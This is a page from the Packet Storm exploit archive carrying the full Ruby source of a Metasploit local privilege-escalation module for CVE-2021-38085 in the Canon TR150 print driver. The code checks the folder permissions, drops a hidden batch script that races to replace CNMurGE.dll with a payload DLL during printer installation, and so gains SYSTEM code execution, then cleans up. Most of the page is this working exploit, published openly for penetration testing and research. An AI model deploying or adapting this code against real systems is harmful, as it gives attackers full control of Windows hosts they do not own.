exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Canon TR150 Driver 3.71.2.10 Privilege Escalation

Canon TR150 Driver 3.71.2.10 Privilege Escalation
Posted Aug 11, 2021
Authored by Jacob Baines, Shelby Pace | Site metasploit.com

Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files within the "CanonBJ" directory and its subdirectories. By overwriting the DLL at C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll with a malicious DLL at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program, which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation will grant attackers code execution as the NT AUTHORITY\SYSTEM user. This Metasploit module leverages the prnmngr.vbs script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive.

tags | exploit, local, code execution
systems | windows
advisories | CVE-2021-38085
SHA-256 | cba47a2c22f1ca9d11622a05f5196ad5f0cf5055087f98e8880fbd03d3be995d

Canon TR150 Driver 3.71.2.10 Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Canon Driver Privilege Escalation',
'Description' => %q{
Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files
within the "CanonBJ" directory and its subdirectories. By overwriting the DLL at
C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll
with a malicious DLL at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs
script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,
which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation
will grant attackers code execution as the NT AUTHORITY\SYSTEM user.

This module leverages the prnmngr.vbs script
to add and delete printers. Multiple runs of this
module may be required given successful exploitation
is time-sensitive.
},
'License' => MSF_LICENSE,
'Author' => [
'Jacob Baines', # discovery, PoC, module
'Shelby Pace' # original Ricoh module
],
'References' =>
[
['CVE', '2021-38085'],
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[
'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
]
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ UNRELIABLE_SESSION ],
'Stability' => [ SERVICE_RESOURCE_LOSS ]
},
'DisclosureDate' => '2021-08-07',
'DefaultTarget' => 0
)
)

self.needs_cleanup = true
end

def check
@driver_path = ''
dir_name = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'

return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name)

language_dirs = dir(dir_name)

return CheckCode::Detected("Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet") unless language_dirs.length

@driver_path = dir_name
@driver_path.concat('\\LanguageModules\\040C')
res = cmd_exec("icacls \"#{@driver_path}\"")
vulnerable = res.match(/\\Users:(?:\(I\))?\(OI\)\(CI\)\(F\)/)

return CheckCode::Safe("#{@driver_path} directory does not exist or does not grant Users full permissions") unless vulnerable

vprint_status("Vulnerable language driver directory: #{@driver_path}")
CheckCode::Appears('Canon language driver directory grants Users full permissions')
end

def add_printer(driver_name)
fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

dll_data = generate_payload_dll
dll_path = "#{@driver_path}\\CNMurGE.dll"

temp_path = expand_path('%TEMP%\\CNMurGE.dll')

bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""

# this script monitors the target dll for modification and then copies
# over our malicious dll. As this is a time based attack, it won't
# always be succuessful!
bat_file = <<~HEREDOC
attrib -a "#{dll_path}"
:repeat
for %%i in ("#{dll_path}") do echo %%~ai | find "a" >nul || goto :repeat
timeout /t 1
#{cp_cmd}
attrib -a "#{dll_path}"
HEREDOC

print_status("Dropping batch script to #{bat_file_path}")
write_file(bat_file_path, bat_file)

print_status("Writing DLL file to #{temp_path}")
write_file(temp_path, dll_data)
register_files_for_cleanup(bat_file_path, temp_path)

script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
vprint_status('Executing the batch script...')
client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })

print_status("Adding printer #{@printer_name}...")
cmd_exec(script_cmd)
rescue Rex::Post::Meterpreter::RequestError => e
fail_with(Failure::Unknown, "#{e.class} #{e.message}")
end

def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine')
end

@printer_name = Rex::Text.rand_text_alpha(5..9)
@script_path = 'C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs'
drvr_name = 'Canon TR150 series'

add_printer(drvr_name)
end

def cleanup
print_status("Deleting printer #{@printer_name}")
sleep(3)
delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close